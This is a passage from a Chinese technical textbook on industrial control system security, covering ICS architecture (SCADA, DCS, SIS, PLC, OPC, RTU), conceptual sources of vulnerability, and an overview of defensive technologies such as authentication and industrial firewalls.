技术报告和标准提供一个通用基础。本标准中的每项技术从以下几方面进行讨论:此技术、 工具和/或对抗措施针对的信息安全脆弱性,典型部署,已知问题和弱点,在IACS 环境中 使用的评估,未来方向,建议和指南,信息源和参考材料。本标准旨在记录适用于 IACS 环境的信息安全技术、工具和对抗措施的已知技术发展水平,明确定义目前可采用哪种技 术,并定义了需要进一步研究的领域。 4)HAD102-16 《核电厂基于计算机的安全重要系统软件》 HAD102-16 于2004年12月8日批准发布,主要是在核电厂计算机重要系统软件在各 个周期进行安全论证时,为其提供收集证据和编制的指导文件。该指导文件从计算机系统 各个方面(如技术考虑、安全管理要求及项目计划等方面)入手,详细列举了系统软件设 计的各个阶段和方面应符合的要求建议,包括软件需求、设计、实现及验证等各个环节, 对与软件系统关联的计算机系统,从集成、系统确认、调试、运行及修改等方面应遵循的 要求建议进行了详细叙述。该指导文件对计算机重要软件安全涉及的方方面面进行了较为 详细的分析及建议,对核电厂信息安全防护体系的建立具有重要的参考意义。 第 2 章 工业控制系统架构与漏洞分析 2.1 工业控制系统架构 一个典型的工业控制系统(简称工控系统)通常由检测环节、控制环节、执行环节和 显示环节组成。 经过这么多年的发展,工业控制系统在控制规模、控制技术和信息共享方面都有了巨 大的变化。在控制规模方面,工业控制系统由最初的小系统发展成现在的大系统;在控制 技术方面,工业控制系统由最初的简单控制发展成现代的复杂或先进控制;在信息共享方 面,工业控制系统由最初的封闭系统发展成现在的开放系统。 企业根据自身生产或运行流程搭建各自不同的工业控制系统。 2.1.1 工业控制系统的范围 按照ANSI/ISA-95.00.01 企业分层模型,可绘制企业典型分层架构图,典型的企业生产或制造系统包括现场设备层、现场控制层、过程监控层、制造执行系 统 (MES) 层、企业管理层和外部网络。 由图2-1 可以看出,以制造执行系统层分界,向上为通用 IT 领域,向下为工业控制 系统领域。 下面对工业控制系统领域制造执行系统层、过程监控层、现场控制层、现场设备层进 行详细介绍。 2.1.2 制造执行系统层 制造执行系统 (MES) 层包括工厂信息管理系统 (PIMS)、 先进控制系统、历史数据 库、计划排产、仓储管理等。 1. 工厂信息管理系统 (PIMS) 工厂信息管理系统是根据企业在信息化时代生产过程中的实际需求而推出的一款管理 软件。工厂信息管理系统 (PIMS) 以“生产管理实用化”作为生产信息管理系统建设的 出发点和最终目标,提供了一套先进的现代企业生产管理模式,帮助企业在激烈的市场竞 争中全方位地迅速了解自己、对市场的快速变化做出符合自身实际情况的物流调整和决 策,提升企业在同行业中的竞争能力。 工厂信息管理系统已经在各个应用控制系统的流程工业领域获得成功实施,在系统集 成、生产调度、能源管理、企业危险源管理等领域得到广泛应用,为用户的企业信息化建 设提供了良好的数据管理平台。 2. 先进控制系统 先进控制系统就是以先进过程控制 (Advanced Process Control,APC)技术为核心的 上位机监控系统。 先进过程控制技术是具有比常规单回路 PID 控制更好效果的控制策略统称,专门用来 处理那些采用常规控制效果不好,甚至无法控制的复杂工业过程控制问题。 先进过程控制技术采用科学、先进的控制理论和控制方法,以工艺控制方案分析和数 学模型计算为核心,以计算机和控制网络为信息载体,充分发挥 DCS 和常规控制系统的 潜力,保证生产装置始终运转在最佳状态,以获取最大的经济效益。 先进过程控制技术可分为3大类。 (1)经典的先进控制技术:变增益控制、时滞补偿控制、解耦控制、选择性控制等。 (2)现今流行的先进控制技术:模型预测控制 (MPC) 、 统计质量控制 (SQC) 、 内模 控制 (IMC) 、 自适控制、专家控制、神经控制器、模糊控制、最优控制等。 (3)发展中的先进控制技术:非线性控制及鲁棒控制等。 2.1.3 过程监控层 过程监控层包括数据采集与监控 (SCADA) 系统、分散型控制系统 (DCS) 、 安全仪 表系统 (SIS) 、 可编程逻辑控制 (PLC) 系统的工程师站、操作员站、OPC 服务器、实时 数据库、监控中心等。 1. 数据采集与监控 (SCADA) 系统 数据采集与监控 (Supervisory Control and Data Acquisition,SCADA) 系统是以计算 机为基础的生产过程控制与调度自动化系统,它可以对现场的运行设备进行监视和控制。 SCADA 系统涉及组态软件、数据传输链路(如数传电台、GPRS 等)、工业隔离安全 网关,其中工业隔离安全网关用于保证工业信息网络的安全,工业上大多要用到这种安全 防护性网关,防止病毒入侵,以保证工业数据、信息的安全。 SCADA 系统的应用领域很广,可以应用于电力、冶金、安防、水利、污水处理、石 油天然气、化工、交通运输、制药,以及大型制造等领域的数据采集与监视控制及过程控 制等。 这些应用领域对 SCADA 的要求不同,由此导致这些不同应用领域的 SCADA 系统的 发展也不完全相同。 在电力系统领域中, SCADA 系统的应用最广泛,技术发展也最成熟。SCADA 作为 能量管理系统 (Energy Management System,EMS) 的一个最主要的子系统,有着信息完 整、效率提高、正确掌握系统运行状态、加快决策、能帮助快速诊断出系统故障状态等优 势,现已经成为电力调度不可缺少的工具。同时, SCADA 在对提高电网运行的可靠性、 安全性与经济效益,减轻调度员的负担,实现电力调度自动化与现代化,提高调度的效率 和水平方面有着不可替代的作用。 在交通运输系统领域中, SCADA 在铁道电气化远动系统上的应用较早,在保证电气 化铁路的安全可靠供电、提高铁路运输的调度管理水平方面发挥了很大作用。在铁道电气 化 SCADA 系统的发展过程中,随着计算机的发展,不同时期有不同的产品,同时我国也 从国外引进了大量 SCADA 产品与设备,这些都带动了铁道电气化远动系统向更高的目标 发展。 SCADA 系统一般为客户/服务器体系结构。在这个体系结构中,服务器与硬件设备通 信,进行数据处理和运算,而客户用于人机交互,如用文字、动画显示现场的状态,并可 以对现场的开关、泵、阀门等进行操作。 2. 分散型控制系统 (DCS) 分散型控制系统 (Distributed Control System,DCS) 是由过程控制级和过程监控 级组成的以通信网络为纽带的多级计算机系统,综合了计算机 (Computer) 、 通信 (Communication) 、 显 示 (CRT) 和控制 (Control)4C 技术,其基本设计思路是分散控 制、集中操作、分级管理、配置灵活、组态方便。 该系统主要由现场控制站 (I/O 站)、数据通信系统、人机接口单元、操作员站、工程师站、机柜、电源等组成。系统具备开放的体系结构,可以提供多层开放数据接口。 硬件系统在恶劣的工业现场具有高度的可靠性,维修方便,工艺先进。多数 DCS 提 供底层汉化的软件平台,具备强大的处理功能,并提供方便组态复杂控制系统的能力与用 户自主开发专用高级控制算法的支持能力,易于组态,易于使用,支持多种现场总线标准 以便适应未来的扩充需要。 系统的主要特点如下: (1)系统的参数、报警、自诊断及其他管理功能高度集中在 CRT 上显示和在打印机 上打印,控制系统在功能和物理上实现真正分散。 (2)系统的设计采用合适的冗余配置和诊断至模件级的自诊断功能,具有高度的可靠 性。系统内任一组件发生故障,均不会影响整个系统的工作。 (3)整个系统的可利用率至少为99.9%;系统平均无故障时间为10 万小时,实现了 对核电、火电、热电、石化、化工、冶金、建材等诸多领域的完整监控。 (4)采用“域”的概念,把大型控制系统用高速实时冗余网络分成若干相对独立的分 系统, 一个分系统构成一个域,各域共享管理和操作数据,而每个域内又是一个功能完整 的 DCS, 以便更好地满足用户的使用。 (5)网络结构具有很好的可靠性、开放性及先进性。在系统操作层,采用冗余的 100Mbps 工业以太网;在控制层,采用冗余的100Mbps 工业以太网,保证系统的可靠 性;在现场信号处理层,采用专用控制总线或采用12Mbps 的 Profibus 总线连接中央控制 单元和各现场信号处理模块。 (6)采用标准的Client/Server 结构。有些 DCS 的操作层采用Client/Server 结构。 (7)采用开放且可靠的操作系统。系统的操作层采用 Windows NT 操作系统;控制 站采用成熟的嵌入式实时多任务操作系统 QNS, 以确保控制系统的实时性、安全性和可 靠性。 (8)采用标准的控制组态软件。系统采用标准的控制组态工具,可以实现任何监测及 控制要求。 (9)系统具有可扩展性和可裁剪性,并可以保证经济性。 3. 安全仪表系统 (SIS) 安全仪表系统 (Safety Instrumented System,SIS) 有时称为安全联锁系统 (Safety Interlocking System,SIS), 主要是为了实现工厂控制系统中报警和安全联锁,对控制系统中 检测的结果实施报警动作、调节或停机控制,是工厂企业自动化控制中的重要组成部分。 安全仪表系统 (SIS) 的主要特点如下: (1)基于IEC61508 标准,符合国际安全协会规定仪表的安全标准规定。 (2)采用容错性的多重冗余系统。SIS 一般采用多重冗余结构以提高系统的硬件故障 裕度,单一故障不会导致 SIS 的安全功能丧失。 (3)覆盖面广、安全性高、有自诊断功能,能够检测并预防潜在的危险。 (4)自诊断覆盖率高,工人维修时需要检查的点数比较少。 (5)应用程序容易修改,可根据实际需要对软件进行修改。 (6)实现从传感器到执行元件所组成的整个回路的安全性设计,具有 I/O 短路、断线 等监测功能。 (7)响应速度快。从输入变化到输出变化的响应时间一般在10~50ms 之间, 一些小 型 SIS 的响应时间更短。 SIS 的主流系统结构主要有三重化 (TMR) 和四重化(2004D) 两种,下面对这两种 结构简单介绍如下。 (1)TMR 结构:这种结构将三路隔离、并行的控制系统(每路称为一个分电路)和 广泛的诊断集成在一个系统中,用三取二表决提供高度完善、无差错、不会中断的控制。 目前,市场上常见的 TRICON 、ICS 等 SIS 均采用 TMR 结构。 (2)2004D 结构:这种结构由两套独立并行运行的系统组成,通信模块负责其同步运 行,当系统自诊断发现一个模块发生故障时,CPU 将强制其失效,确保其输出的正确 性。同时,安全输出模块中的 SMOD 功能(辅助去磁方法)可确保在两套系统同时故障 或电源故障时,系统输出一个故障安全信号。 一个输出电路实际上是通过4个输出电路及 自诊断功能实现的,从而确保了系统的高可靠性、高安全性及高可用性。 目前,市场上常见的 HONEYWELL 、HIMA 等 SIS 均采用2004D 结构。 安全仪表系统(SIS) 的基本功能和要求如下: (1)实现安全联锁报警,对于一般的工艺操作参数均有设定的报警值和联锁值。 (2)保证生产的正常运转、事故的安全联锁,控制系统 CPU 的扫描时间一定要达到 毫秒等级。 (3)联锁动作和投运显示。 安全联锁系统的附加功能和要求如下。 (1)安全联锁延时。 (2)安全联锁的预报警功能。 (3)安全联锁系统的投入和切换。 (4)第一事故原因区别。 (5)手动紧急停车。 (6)分级安全联锁。 (7)安全联锁复位。 4. 可编程逻辑控制器 (PLC) 可编程逻辑控制器 (Programmable Logic Controller,PLC) 是一种采用一类可编程 的存储器,用于其内部存储程序,执行逻辑运算、顺序控制、定时、计数与算术操作等 面向用户的指令,并通过数字或模拟式输入/输出控制各种类型的机械或生产过程的控制 设备。 从实质上来看,可编程逻辑控制器是一种专用于工业控制的计算机,其硬件结构基本 上与微型计算机相同,外形如图2-2所示。 图2-2 可编程逻辑控制器外形 1)PLC 的基本构成 (1)电源部分。 可编程逻辑控制器的电源部分在整个系统中起着十分重要的作用。没有一个良好的、 可靠的电源,系统是无法正常工作的,因此,可编程逻辑控制器的制造商对电源部分的设 计和制造非常重视。 一般交流电压波动在+10%~+15%范围内时,可以不采取其他措施而 将 PLC 直接连接到交流电网中。 (2)中央处理单元 (CPU) 部分。 中央处理单元 (CPU) 部分是可编程逻辑控制器的控制中枢。 CPU 按照可编程逻辑控制器系统程序赋予的功能接收并存储从编程器输入的用户程 序和数据,检查电源、存储器、 I/O, 以及警戒定时器的状态,并能诊断用户程序中的语 法错误。当可编程逻辑控制器投入运行时,首先以扫描的方式接收现场各输入装置的状态 和数据,并分别存入 I/O 映像区,然后从用户程序存储器中逐条读取用户程序,经过命令 解释后按指令的规定执行逻辑或算术运算,将结果送入I/O 映像区或数据寄存器内。等到 所有的用户程序执行完毕之后,将 I/O 映像区的各输出状态或输出寄存器内的数据传送到 相应的输出装置,如此循环,直到停止运行为止。 此外,为了进一步提高可编程逻辑控制器的可靠性,对大型可编程逻辑控制器采用双 CPU 构成冗余系统,或采用三 CPU 的表决式系统,从而即使某个 CPU 出现故障,整个系 统仍能正常运行。 (3)存储器部分。 存储器部分分为两种,存放系统软件的存储器称为系统程序存储器,存放应用软件的 存储器称为用户程序存储器。 (4)输入/输出接口电路部分。 现场输入接口电路部分通常由光耦合电路和微机的输入接口电路组成,其作用是作为 可编程逻辑控制器与现场控制接口界面的输入通道。 现场输出接口电路部分通常由输出数据寄存器、选通电路和中断请求电路组成,其作 用是可编程逻辑控制器通过现场输出接口电路向现场的执行部件输出相应的控制信号。 (5)功能模块部分。 功能模块部分是为适应现场某些特殊控制需要而设计的相应智能模块,如高速计数模块、定位模块、PID 调节模块等。 (6)通信模块部分。 通信模块部分是基于计算机技术和通信技术的发展要求而设计的模块,通常用于包括上 位机和 PLC 之间、PLC 和 PLC 之间、PLC 和远程I/O 之间及PLC 和传动设备之间的通信。 2)PLC 的工作原理 当可编程逻辑控制器投入运行后,其工作过程一般分为输入采样、用户程序执行和输 出刷新三个阶段。可编程逻辑控制器完成上述三个阶段的过程称为一个扫描周期。在整个 运行期间,可编程逻辑控制器的CPU 以一定的扫描速度重复执行上述三个阶段。 (1)输入采样阶段。 在输入采样阶段,可编程逻辑控制器通过扫描方式依次读入所有输入状态和数据,并 将它们存入 I/O 映像区中的相应单元内。在输入采样结束后,转入用户程序执行阶段和输 出刷新阶段。在用户程序执行阶段和输出刷新阶段,即使输入状态和数据发生变化, I/O 映像区中相应单元的状态和数据也不会改变。因此,对于输入信号是脉冲信号,则该脉冲信 号的宽度必须大于一个扫描周期,以保证在任何情况下,该输入信号均能被读入。 (2)用户程序执行阶段。 在用户程序执行阶段,可编程逻辑控制器总是按由上而下的顺序依次扫描用户程序, 如梯形图、 STL 语言等。以梯形图为例,在扫描每一条梯形图时,又总是先扫描梯形图左 边由各触点构成的控制线路,并按先左后右、先上后下的顺序对由触点构成的控制线路进 行逻辑运算,然后根据逻辑运算的结果,刷新该逻辑线圈在系统 RAM 存储区中对应位的 状态,或者刷新该输出线圈在 I/O 映像区中对应位的状态,或者确定是否要执行该梯形图 所规定的特殊功能指令。 在用户程序执行过程中,输入点在 I/O 映像区内的状态和数据不会发生变化,而其他 输出点和软设备在 I/O 映像区或系统 RAM 存储区内的状态和数据都有可能发生变化,并 且排在上面的梯形图,其程序执行结果会对排在下面的凡是用到这些线圈或数据的梯形图 起作用;相反,排在下面的梯形图,其被刷新的逻辑线圈的状态或数据只能到下一个扫描 周期才能对排在其上面的程序起作用。 在用户程序执行过程中,如果使用立即 I/O 指令,则可以直接存取 I/O 点,但是输入 过程映像寄存器的值不会被更新,因为程序直接从 I/O 模块取值,而输出过程映像寄存器 会被立即更新,这与立即输入是有区别的。 (3)输出刷新阶段。 在扫描用户程序结束后,可编程逻辑控制器就进入输出刷新阶段。在此期间, CPU 按照 I/O 映像区内对应的状态和数据刷新所有的输出锁存电路,再经输出电路驱动相应的 外部设备。此时,才是可编程逻辑控制器的真正输出。 5.OPC 服务器 OPC的全称是 Object Linking and Embeding(OLE)for Process Control, 它的出现为 基于 Windows 的应用程序和现场过程控制应用建立了桥梁。过去为了存取现场设备的数 据信息,每一个应用软件开发商都需要编写专用的接口函数。现场设备的种类繁多且产品不断升级,给用户和软件开发商带来了巨大的工作负担且不能满足工作的实际需要,系统 集成商和开发商急切需要一种具有高效性、可靠性、开放性、可互操作性的即插即用的设 备驱动程序。在这种情况下, OPC 标准应运而生。OPC 标准以微软公司的 OLE 技术为基 础,它的制定是通过提供一套标准的 OLE/COM 接口完成的,在 OPC 技术中使用的是 OLE 2 技术, OLE 标准允许多台微机之间交换文档、图形等对象。 通过 DCOM 技术和 OPC 标准,完全可以创建一个开放的、可互操作的控制系统软 件。 OPC 采用客户/服务器模式,把开发访问接口的任务放在硬件生产厂家或第三方厂 家,以 OPC 服务器的形式提供给用户,从而解决了软硬件厂商的矛盾,完成了系统的集 成,提高了系统的开放性和可互操作性。 2.1.4 现场控制层 现场控制层包括数据采集与监控 (SCADA) 系统、分散型控制系统 (DCS) 、 安全仪 表控制系统 (SIS) 、 可编程逻辑控制系统的控制器或控制站。 这些控制器或控制站已在上一节中详细介绍,在此不做介绍。 2.1.5 现场设备层 现场设备层包括现场仪表和其他控制设备。 现场仪表通常包括温度、压力、流量、液位、电量、位移等仪表,特种检测仪表如成 分分析仪,以及控制阀、电动阀等执行机构。 远程终端装置 (Remote Terminal Unit,RTU) 是用于监视、控制与数据采集的应用控 制设备,具有遥测、遥信、遥调、遥控等功能。 目前,远程终端装置尚无统一的行业标准, 一般来说符合下列技术特征的控制设备均 称为 RTU, 其主要特点如下。 (1)标准的编程语言环境。 (2)极强的环境适应能力,工作温度为-40~70℃,环境湿度为5%~95%RH。 (3)丰富的通信接口,支持多种通信方式,通信距离长。 (4)多种标准通信协议。 (5)大容量存储能力。 (6)实时多任务操作系统。 (7)灵活且互相兼容的开放式接口。 (8)极强的抗电磁干扰能力。 RTU的主要功能如下: (1)直接采集系统工频电量,实现对电压、电流、有功、无功的测量并向远方发送, 可计算正/反向电度。 (2)采集脉冲电度量并向远方发送,带有光电隔离。 (3)采集状态量并向远方发送,带有光电隔离,遥信变位优先传送。 (4)接收并执行遥控及返校。 (5)程序自恢复。 (6)设备自诊断,故障诊断到插件级。 (7)接收并执行遥调。 (8)接收并执行校时命令。 (9)与两个及两个以上的主站通信。 (10)采集事件顺序记录并向远方发送。 (11)提供多个数字接口及多个模拟接口。 (12)可对每个接口特性进行远方/当地设置。 (13)提供若干种通信规约,每个接口可以根据远方/当地设置传输不同规约的数据。 (14)接收远方命令,选择发送各类信息。 (15)支持与扩频、微波、卫星、载波等设备的通信。 (16)选配及多规约同时运行。 (17)可通过电信网和电力系统通道进行远方设置。 (18)设备自调。 (19)通道监视。 (20)可转发多个子站远程信息。 (21)当地显示功能,当地接口有隔离器。 与常用的 PLC 相比, RTU 通常具有优良的通信能力和更大的存储容量,适用于更恶 劣的温度和湿度环境,可提供更多的计算功能。 经过几代产品的开发和应用,RTU 产品在核设施、钢铁、化工、石油石化、电力、 天然气、水利枢纽、环境保护、铁路、交通运输、民航、城市供水供气供热、市政调度等 领域的控制系统中已获得广泛应用。 2.2 工业控制系统的漏洞分析 自从工业控制系统 (ICS) 问世以来, 一直采用专用的硬件、软件和通信协议。由于 是封闭系统或称为“信息孤岛”,具有较强的专用权,所以这些系统受外来影响较小,从 而其信息安全问题未受到足够重视。 由于信息技术的迅猛发展,信息化在企业中的应用也取得了飞速发展,互联网技术的 出现,使得工业控制系统网络中大量采用通用 TCP/IP 技术,工业控制系统网络和企业管 理网的联系越来越紧密,工业控制系统也由封闭系统演变成现在的开放系统,其设计上基 本没有考虑互联互通所必须考虑的通信安全问题。企业管理网与工业控制系统网络的防护 功能都很弱甚至几乎没有隔离功能,因此,在工业控制系统开放的同时,也减弱了控制系 统与外界的隔离,工业控制系统的安全隐患问题日益严峻。工业控制系统中任何一点受到 攻击都有可能导致整个系统瘫痪。 下面将详细介绍工业控制系统技术演变、详细比较工业控制系统与信息技术系统、挖掘 工业控制系统信息安全问题的根源,直至详细分析出工业控制系统漏洞。 2.2.1 工业控制系统技术演变 在20世纪90年代中期之前,由于 Internet 技术尚未成熟,当时的 IT 技术不能完全 满足工业自动化实时性和环境适应性等要求,于是各家公司都利用自己掌握的计算机技术 开发具有专有权操作系统的工业自动化装置、专有权协议的网络及其自动化系统。 最近几年,这种情况发生了急剧变化,传统自动化技术与 IT 技术加速了融合的进 程,工业自动化系统已广泛采用微软 Windows 操作系统和 TCP/IP 标准网络协议,工业实 时以太网已经被工业自动化领域广泛接受, IT 技术快速进入工业自动化系统的各个层 面,改变了自动化系统长期以来不能与 IT 技术同步增长的局面。工厂企业的信息化,可 以实现智能工厂中从管理层、控制层到现场层的信息无缝集成,使得过程控制系统 (PCS) 与制造执行系统(MES), 以及企业管理信息系统 (ERP) 有机地融为一体,并能 通过 Internet 完成远程维护与监控。这种不可阻挡的发展趋势随之也带来了工业网络的安 全问题,如何保证工业网络的机密性、完整性和可用性成为工业自动化系统必须考虑的一 个重要问题。 过去几年,由于各行各业工业控制系统安全事故频发,导致工业经济损失,甚至扰乱 社会公共秩序。这些事实和危害已在第1章中提到。因此,许多行业内外人士开始密切关 注工业控制系统信息安全。工业控制系统厂商为了解决此类问题而不断改进自身系统,努 力面对将来的挑战,工业控制系统的信息安全经历了迅猛发展。 由此可见,在短短几十年中,工业控制系统经历了跨越式发展,在系统方面、通信网 络方面、运营方面、安全机制方面、服务方面等都发生了巨大变化,这些变化如图2-3 所示。 2.2.2 工业控制系统与信息技术系统的比较 第1章中已针对工业控制系统与信息技术系统在可用性、完整性、保密性3个基本需 求方面进行了比较。 工业控制系统与信息技术系统相比有许多不同的特点,包括不同的风险和优先事项,其 中包括员工生命的健康与安全、生态环境的保护、生产设备的运行,以及对国民经济的影 响。工业控制系统有不同的性能和可靠性要求,所使用的操作系统和应用程序与典型的信息 技术系统也不一样。此外,控制系统的设计和操作有时会形成安保与效率的冲突。 用于工业控制系统的网络通信技术来源于信息技术系统的办公自动化网络技术,但是 又不同于办公环境使用的计算机网络技术,这是因为信息技术系统通信以传递信息为最终 目的,而工业控制系统网络传递信息以引起物质或能量的转移为最终目标。众所周知,在 办公应用环境中,计算机病毒和蠕虫往往会导致公司网络故障,因而办公网络的信息安全 越来越受到重视,通常采用杀毒软件和防火墙等软件方案解决安全问题。在工业应用环 境,恶意软件的入侵将会造成生产线停顿,从而导致严重后果。因此,工业控制系统安全 有更高的要求,信息技术系统信息安全的解决方案已不能满足这些需要。 工业控制系统与信息技术系统在系统结构方面有明显的差别。 2.2.3 工业控制系统信息安全问题的根源 工业控制系统信息安全问题的根源是缺乏本质安全。 工业控制系统信息安全问题的根源:在设计之初,由于资源受限,非面向互联网等原 因,为保证实时性和可用性,系统各层普遍缺乏安全性设计。 尽管目前已有工业控制产品提供商开始对旧系统进行加固升级,研发新一代的安全工 业控制产品,但是由于市场、技术、使用环境等方面的制约,工业控制产品生产商普遍缺 乏主动进行安全加固的动力。 在缺乏安全架构顶层设计的情况下,技术研究无法形成有效的体系,产品形态目前多 集中在网络安全防护层面,工控系统自身的安全性能提升缺乏长远规划。 工业控制产品模块结构图如图2-4所示,具体分析如下。 CPU 作为硬件基础平台的核心,技术掌握在国外厂商手中,“后门”漏洞的隐患始终 存在,目前国内研究和生产 CPU 的品牌主要包括龙芯、众志、多思等,在通用处理器、 嵌入式处理器、专用处理器等方面都有了相应产品,但是否符合工控系统的性能要求和安 全要求,能否在我国工控领域广泛应用,有待进一步研究和验证。 1. 操作系统 工业控制系统的操作系统在系统级和设备级是不同的,分别介绍如下。 (1)系统级:普遍采用通用的商业操作系统。 (2)设备级:采用实时操作系统。 操作系统的安全隐患包括以下几点。 (1)管理员一权独大。 (2)访问控制形同虚设。 (3)脆弱的登录认证方式。 (4)层出不穷的系统漏洞。 操作系统的现状介绍如下: 20 世纪70 年代,美国国防部制定的“可信计算机系统安全评价准则”(TCSEC) 是 安全信息系统体系结构的最早准则(只考虑保密性),其安全级别如表2-3所示。 通过分析国内应用情况,我国工业控制系统操作系统的现状如下: (1)B1 级以上的操作系统对国内禁运。 (2)目前主流的商业操作系统多为C2 级。 (3)等级型的自主访问控制,超级管理员用户可对其他用户的客体资源直接进行任意 修改和访问,没有引入标记与强制访问控制,更没有相应的保障类要求。 因此,现有安全产品的不足之处包括无法改变操作系统的访问控制模型,可以直接对 工控设备控制;无法应对具有针对性的恶意代码;无法保证操作系统的可信度。 目前,有些厂商对操作系统进行安全加固方面的研究和应用。 在实时操作系统方面,国内厂商少有涉猎。 2. 实时数据库 实时数据库是工控系统的核心数据源。目前,实时数据库存在以下问题: (1)需要解决实时性与安全性的矛盾。 (2)系统管理员特权问题。 (3)非法操作检查等。 目前主要的实时数据库产品有:国外主要的产品包括 OSI 公司的 PI 、Aspen 公司的InfoPlus 、Honeywell 公司的 PHD 、Instep 公司的 eDNA 等,国内主要的产品包括力控公司的 pSpace、中科院软件所的安捷 (Agilor)、浙大中控的ESP-iSYS、 紫金桥的 RealDB 等。 自主实时数据库系统可以提高实时性、充分利用硬件资源、解决安全性矛盾。 3. 应用软件 随着系统功能越来越多,应用软件规模逐渐增大、复杂性越来越高,系统错误越来越 难以检测和避免。提高软件系统的安全性,保证软件设计开发的正确性是需要亟待解决的 问题。 4. 通信网络 被业界广泛采纳的“纵深防御”理念,其前提和方案基于以下考虑。 (1)前提:目前系统本身无法达到本质安全的要求。 (2)方案:在外部世界的威胁和工控网络之间建立尽可能多层次的保护。 2.2.4 工业控制系统的漏洞的详细分析 1. 通信协议漏洞 工业化与信息化的融合和物联网的发展,使得 TCP/IP 协议和 OPC 协议等通用协议 越来越广泛地应用在工业控制网络中,随之而来的通信协议漏洞问题也日益突出。 例如,OPC Classic协 议 (OPC DA,OPC HAD和 OPC A&E) 基于微软的 DCOM 协 议, DCOM 协议是在网络安全问题被广泛认识之前设计的,极易受到攻击,并且 OPC 通 信采用不固定的端口号,从而导致目前几乎无法使用传统的 IT 防火墙来确保其安全性。 因此,确保使用 OPC 通信协议的工业控制系统的安全性和可靠性给工程师带来了极大的 挑战。 2. 操作系统漏洞 目前大多数工业控制系统的工程师站/操作员站/HMI 都是 Windows 平台的,为保证过 程控制系统的相对独立性,同时考虑到系统的稳定运行,通常现场工程师在系统开始运行 后不会对 Windows 平台安装任何补丁,但是存在的问题是,不安装补丁,系统就存在被 攻击的可能,从而埋下安全隐患。 3. 安全策略和管理流程漏洞 追求可用性而牺牲安全,是很多工业控制系统存在的普遍现象,缺乏完整、有效的安 全策略与管理流程也给工业控制系统信息安全带来了一定的威胁。例如,工业控制系统中 移动存储介质包括笔记本电脑、U 盘等设备的使用和不严格的访问控制策略。 4. 杀毒软件漏洞 为了保证工控应用软件的可用性,许多工控系统操作员站通常不会安装杀毒软件。即使安装了杀毒软件,在使用过程中也有很大的局限性,原因在于使用杀毒软件很关键的一 点是,其病毒库需要经常更新,这一要求尤其不适合于工业控制环境,而且杀毒软件对新 病毒的处理总是滞后的,从而导致每年都会爆发大规模的病毒攻击,特别是新病毒。 5. 应用软件漏洞 由于应用软件多种多样,很难形成统一的防护规范以应对安全问题;另外,当应用软 件面向网络应用时,必须开放其应用端口。因此,常规的 IT 防火墙等安全设备很难保障 其安全性。互联网攻击者很有可能会利用一些大型工程自动化软件的安全漏洞来获取诸如 污水处理厂、天然气管道,以及其他大型设备的控制权, 一旦这些控制权被不良意图黑客 所掌握,那么后果不堪设想。 国家信息安全漏洞共享平台 (China National Vulnerability Database,CNVD)在2011 年收录了100 余个对我国影响广泛的工业控制系统软件安全漏洞,较2010年大幅增长近 10 倍,涉及西门子、北京三维力控等国内外知名工业控制系统制造商的产品,部分摘录 如表2-4 所示。相关企业虽然积极配合国家互联网应急中心 (CNCERT) 处理了安全漏 洞,但这些漏洞可能被黑客或恶意软件利用。 第 3 章 工业控制系统信息安全技术与 方案部署 3.1 工业控制系统信息安全技术简介 工业控制系统信息安全技术作为工业控制系统的重中之重,正吸引着全球工业控制系 统产品制造商、用户、工程公司、相关职能部门的目光。理解和掌握这些工业控制系统信 息安全技术,才能为工业控制系统信息安全提供有效的解决方案。 工业控制系统信息安全技术一般分为五大类,包括鉴别与授权技术,过滤、阻止、访 问控制技术,编码技术与数据确认技术,管理、审计、测量、监控和检测技术,以及物理 安全控制技术。 3.1.1 鉴别与授权技术 鉴别与授权是工业控制系统访问控制的最基本要求。鉴别用于验证用户所声称的身 份,即验证用户身份的过程或装置,通常是允许进行信息系统资源访问的先决条件。授权 是批准进入系统访问系统资源的权利。 鉴别与授权技术包括基于角色的授权工具、口令鉴别、物理/令牌鉴别、智能卡鉴 别、生物鉴别、基于位置的鉴别、设备至设备的鉴别等。 1. 基于角色的授权工具 根据工业控制系统用户的角色或职责,分配不同的访问权限,如操作人员权限、维护 人员权限、管理人员权限、工程人员权限等。 目前的工业控制系统均配置这种基于角色的授权工具。 2. 口令鉴别 口令鉴别是工业控制系统最简单、最常用的鉴别技术。 在工业控制系统中,口令能够用于限制授权用户请求的服务和功能。 3. 物理/令牌鉴别 物理/令牌鉴别与口令鉴别相似,只是用户在请求访问时必须有安全令牌或智能卡。 4. 智能卡鉴别 智能卡鉴别与令牌鉴别相似,只是它能提供更多的功能。 5. 生物鉴别 生物鉴别通过请求用户独特的生物特征来确定其真实性。 常用的生物鉴别有指纹仪、掌形仪、眼睛识别、面部识别、声音识别等。 6. 基于位置的鉴别 基于位置的鉴别技术是指通过设备或请求访问用户的空间位置来确定其真实性。 这种鉴别技术通常要求系统配有 GPS 技术。目前这种技术应用较少。 7. 设备至设备的鉴别 设备至设备的鉴别是指确保在两个设备之间数据传送发生的恶意改变能得到识别。 这种鉴别技术通常与编码技术一起部署。 3.1.2 过滤、阻止、访问控制技术 过滤、阻止、访问控制技术用于指导和调节已授权的设备或系统的信息流量。 过滤、阻止、访问控制技术包括工业防火墙技术、基于主机的防火墙技术、虚拟网络 技术等。 1. 工业防火墙技术 工业防火墙是工业控制系统信息安全必须配置的设备。工业防火墙技术是工业控制系 统信息安全技术的基础。 工业防火墙技术可以实现区域管控,划分控制系统安全区域,对安全区域实现隔离保 护,保护合法用户访问网络资源;同时,可以对控制协议进行深度解析,可以解析 Modbus 、DNP3 等应用层的异常数据流量,并对 OPC 端口进行动态追踪,对关键寄存器 和操作进行保护。 工业防火墙技术包括数据包过滤防火墙技术、状态包检测防火墙技术和代理服务网关 防火墙技术。 数据包过滤防火墙适用于工业控制,早期市场中已普遍使用,但其缺陷也慢慢显现 出来。 状态包检测防火墙适用于工业控制,目前正在推广应用,其优越性也开始显现。 代理服务网关防火墙不太适用于工业控制,但也有不计较延时情况的应用。 有关工业防火墙技术的详细分析见第3.2节。 2. 基于主机的防火墙技术 基于主机的防火墙技术是部署在工作站或控制器的软件解决方案,用于控制进出特定设备的流量。 这种基于主机的防火墙技术具有与工业防火墙类似的能力,包括状态包检测。目前这 种技术偶尔用于非关键的工作站。 3. 虚拟网络技术 虚拟局域网将物理网络分成几个更小的逻辑网络,以增加性能、提高可管理性,以及 简化网络设计。 虚拟网络技术在控制系统中运用较多。 3.1.3 编码技术与数据确认技术 编码技术是对授权信息数据进行编码与解码的技术。数据确认技术可以保护用于工业 过程的信息的准确性和完整性。 编码技术与数据确认技术包括对称密钥编码技术、公钥编码与密钥分配技术、虚拟专 用网络技术等。 1. 对称密钥编码技术 